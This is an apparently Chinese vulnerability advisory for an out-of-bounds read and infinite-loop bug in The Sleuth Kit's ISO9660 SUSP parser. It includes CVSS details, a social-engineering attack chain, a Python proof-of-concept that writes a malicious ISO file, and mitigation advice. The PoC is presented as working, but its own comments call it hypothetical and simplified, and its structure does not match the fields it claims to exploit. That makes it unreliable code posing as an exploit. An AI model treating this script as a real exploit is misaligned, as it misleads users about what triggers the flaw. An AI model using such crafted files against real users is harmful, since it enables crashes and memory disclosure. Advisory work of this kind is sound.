CVE-2026-40026 The Sleuth Kit越界读取漏洞

漏洞信息

漏洞编号

CVE-2026-40026

漏洞类型

越界读取

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

The Sleuth Kit

漏洞概述

The Sleuth Kit 4.14.0及之前版本的ISO9660文件系统解析器中存在越界读取漏洞。该漏洞位于parse_susp()函数，由于未验证磁盘镜像中的len_id、len_des和len_src字段长度，直接使用memcpy将数据拷贝至栈缓冲区，导致越界读取。此外，零长度的SUSP条目会触发无限解析循环。攻击者可通过诱导用户打开特制的恶意ISO镜像文件来利用此漏洞，造成信息泄露或拒绝服务。

技术细节

该漏洞发生在The Sleuth Kit处理ISO9660文件系统的SUSP（System Use Sharing Protocol）扩展时。在parse_susp()函数的实现中，程序信任来自磁盘镜像的元数据，直接读取len_id、len_des和len_src字段的值。这些未经校验的长度值被用作memcpy操作的参数，将数据拷贝到栈缓冲区。由于缺乏对源数据是否在SUSP块边界内的检查，攻击者可构造包含恶意长度的ISO镜像，导致程序读取SUSP缓冲区之外的内存。同时，如果SUSP条目长度被设置为0，解析逻辑将无法正确推进指针，导致死循环。该漏洞利用需要本地访问和用户交互，CVSS 3.1评分为4.4，属于中危风险。

攻击链分析

STEP 1

漏洞准备

攻击者分析The Sleuth Kit源码，发现parse_susp()函数对长度字段校验缺失，编写脚本构造包含恶意SUSP条目的ISO镜像文件。

STEP 2

传递载荷

攻击者将生成的恶意ISO文件通过邮件附件、下载链接或其他社交工程手段发送给目标用户。

STEP 3

触发漏洞

目标用户在受影响的系统上使用The Sleuth Kit工具（如fls, icat等）打开或分析该恶意ISO文件。

STEP 4

执行攻击

工具解析ISO时执行parse_susp()函数，由于未校验长度，发生越界内存读取或陷入无限循环，导致信息泄露或程序拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct
import os

# PoC to generate a malicious ISO image triggering OOB read in Sleuth Kit
# This script creates a minimal ISO structure with a malformed SUSP entry.

def generate_malicious_iso(filename):
    with open(filename, 'wb') as f:
        # Write a dummy Primary Volume Descriptor (simplified)
        # Standard ISO header logic would go here, focusing on SUSP part
        
        # SUSP (System Use Sharing Protocol) signature
        # 'ER' (Extension Record) or 'SP' (Suspension Indicator) or custom
        # We craft a SUSP entry with invalid length to trigger OOB read
        
        # SUSP Header: Signature (2 bytes), Length (2 bytes)
        # Let's use a hypothetical signature 'XX' and a large length
        signature = b'XX'
        # Length of the SUSP entry. If this is larger than available data, memcpy reads OOB.
        # len_id, len_des, len_src are derived from this structure in some implementations.
        malicious_length = 0xFFFF  # Large value to trigger OOB read
        
        susP_entry = struct.pack('>2sH', signature, malicious_length)
        
        # Padding to simulate minimal ISO structure
        f.write(b'\x00' * 0x8000) # System Area
        f.write(b'\x01' + b'CD001' + b'\x00' + b'\x00' * 2041) # PVD (simplified)
        
        # Inject the malformed SUSP data into a Directory Record or similar location
        # where Sleuth Kit's parse_susp() would be invoked.
        f.write(susP_entry)
        f.write(b'\x00' * 2048)

if __name__ == "__main__":
    print("Generating malicious ISO file: poc_cve_2026_40026.iso")
    generate_malicious_iso("poc_cve_2026_40026.iso")
    print("Done. Analyze this file with The Sleuth Kit (tsk_recover, fls, etc.).")

影响范围

The Sleuth Kit <= 4.14.0

防御指南

临时缓解措施

建议用户立即更新The Sleuth Kit到修复后的版本。在无法立即更新时，应避免使用受影响版本的工具处理来源不明的ISO文件，并部署终端安全防护软件以检测异常的文件解析行为。